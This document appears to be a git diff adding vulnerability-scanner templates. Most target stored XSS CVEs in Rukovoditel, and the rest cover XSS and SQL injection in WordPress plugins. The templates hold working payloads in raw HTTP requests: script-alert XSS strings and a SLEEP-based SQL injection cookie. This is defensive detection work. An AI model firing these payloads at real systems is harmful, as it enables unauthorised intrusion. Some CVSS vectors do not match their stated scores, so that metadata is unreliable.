CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43170 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml new file mode 100644 index 0000000000..83416143de --- /dev/null +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43185 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43185 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml new file mode 100644 index 0000000000..5802278e39 --- /dev/null +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44944 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/14 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44944 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml new file mode 100644 index 0000000000..0801892bf4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44946 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/15 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44946 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml new file mode 100644 index 0000000000..897d16e2e4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44947 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/13 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44947 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml new file mode 100644 index 0000000000..df5122ae57 --- /dev/null +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44948 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/8 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44948 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml new file mode 100644 index 0000000000..2cb5e694f9 --- /dev/null +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44949 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/12 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44949 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml new file mode 100644 index 0000000000..b0857fad91 --- /dev/null +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44950 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/10 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44950 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44950 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml new file mode 100644 index 0000000000..b88e86034d --- /dev/null +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44951 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/11 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44951 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44951 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml new file mode 100644 index 0000000000..868fa826c6 --- /dev/null +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -0,0 +1,142 @@ +id: CVE-2022-44952 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/9 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44952 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NAME]" + + Test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" + + test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_LOGO"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_FAVICON"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FAVICON]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" + + english.php + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SKIN]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" + + America/New_York + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" + + 10 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" + + m/d/Y + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" + + m/d/Y H:i + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" + + 2/./* + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA-- + + - | + @timeout: 5s + GET /index.php?module=dashboard/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(content_type_4, "text/html")' + - 'contains(body_4, "")' + - 'contains(body_4, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml new file mode 100644 index 0000000000..9cbdadc655 --- /dev/null +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-0514 + +info: + name: Membership Database <= 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05 + - https://wordpress.org/plugins/member-database/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-0514 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Member Database")' + condition: and diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml new file mode 100644 index 0000000000..8d9da20898 --- /dev/null +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-1730 + +info: + name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + remediation: Fixed in version 3.1.5 + reference: + - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 + - https://wordpress.org/plugins/supportcandy/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-1730 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "supportcandy")' + condition: and diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml new file mode 100644 index 0000000000..35d0e2d486 --- /dev/null +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-1835 + +info: + name: Ninja Forms < 3.6.22 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341 + - https://wordpress.org/plugins/ninja-forms/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1835 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1835 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Ninja Forms")' + condition: and diff --git 